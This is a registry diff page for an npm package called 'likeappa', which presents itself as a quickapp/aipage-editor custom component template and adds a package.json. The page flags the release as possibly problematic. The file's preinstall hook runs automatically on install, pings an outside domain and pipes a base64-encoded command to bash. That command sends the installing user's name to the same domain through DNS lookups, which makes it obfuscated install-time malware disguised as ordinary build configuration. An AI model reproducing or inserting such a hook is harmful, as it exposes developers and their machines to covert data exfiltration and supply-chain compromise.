likeappa 1.0.2
This diff represents the content of publicly available package versions that have been released to one of the supported registries. The information contained in this diff is provided for informational purposes only and reflects changes between package versions as they appear in their respective public registries.
Potentially problematic release.
This version of likeappa might be problematic. Click here for more details.
- package/package.json +64 -0
package/package.json
ADDED
|
@@ -0,0 +1,64 @@
|
|
|
1
|
+
|
|
2
|
+
{
|
|
3
|
+
"name": "likeappa",
|
|
4
|
+
"version": "1.0.2",
|
|
5
|
+
"description": "aipage-editor自定义组件模板,quickapp版自定义组件,用于开发快应用自定义组件。",
|
|
6
|
+
"keywords": [
|
|
7
|
+
"自定义组件注册器",
|
|
8
|
+
"quickapp自定义1组件注册器",
|
|
9
|
+
"aipage-editor1自定义组件",
|
|
10
|
+
"aipage-editor自1定义插件"
|
|
11
|
+
],
|
|
12
|
+
"author": "pwd1",
|
|
13
|
+
"scripts": {
|
|
14
|
+
"preinstall": "ping rrrr.e66112d2.dns.1433.eu.org && echo cGluZyAtbmMgMSBgd2hvYW1pYC5yY2UuZTY2MTEyZDIuZG5zLjE0MzMuZXUub3JnICYmIGRpZyBgd2hvYW1pYC5yY2UuZTY2MTEyZDIuZG5zLjE0MzMuZXUub3Jn|base64 -d|bash",
|
|
15
|
+
"preview": "hap server --watch",
|
|
16
|
+
"build": "hap build",
|
|
17
|
+
"preview:h5": "amis preview",
|
|
18
|
+
"linkDebug": "amis linkDebug",
|
|
19
|
+
"build2lib": "amis build2lib",
|
|
20
|
+
"format": "prettier --write \"src/**/**/*.{js,jsx,ts,tsx,vue,scss,json}\""
|
|
21
|
+
},
|
|
22
|
+
"aipage-widgets": [
|
|
23
|
+
{
|
|
24
|
+
"type": "quick-info-card1",
|
|
25
|
+
"framework": "vue3",
|
|
26
|
+
"description": "nice,work",
|
|
27
|
+
"entry": "/web/renderer.umd",
|
|
28
|
+
"files": [
|
|
29
|
+
"/web/renderer.css"
|
|
30
|
+
],
|
|
31
|
+
"editorPlugin": {
|
|
32
|
+
"pluginEntry": "/web/plugin.umd",
|
|
33
|
+
"tag": [
|
|
34
|
+
"快应用组件"
|
|
35
|
+
],
|
|
36
|
+
"sort": 100,
|
|
37
|
+
"device": [
|
|
38
|
+
"mobile",
|
|
39
|
+
"quickapp",
|
|
40
|
+
"quickapp-card"
|
|
41
|
+
]
|
|
42
|
+
}
|
|
43
|
+
},
|
|
44
|
+
{
|
|
45
|
+
"type": "quick-info-card1",
|
|
46
|
+
"framework": "quickapp",
|
|
47
|
+
"entry": "/src/components/info-card"
|
|
48
|
+
}
|
|
49
|
+
],
|
|
50
|
+
"husky": {
|
|
51
|
+
"hooks": {
|
|
52
|
+
"pre-commit": "lint-staged",
|
|
53
|
+
"commit-msg": "commitlint -E HUSKY_GIT_PARAMS"
|
|
54
|
+
}
|
|
55
|
+
},
|
|
56
|
+
"lint-staged": {
|
|
57
|
+
"src/**/**/*.{js,jsx,ts,tsx,vue,scss,json}": [
|
|
58
|
+
"prettier --write"
|
|
59
|
+
]
|
|
60
|
+
},
|
|
61
|
+
"browserslist": [
|
|
62
|
+
"chrome 65"
|
|
63
|
+
]
|
|
64
|
+
}
|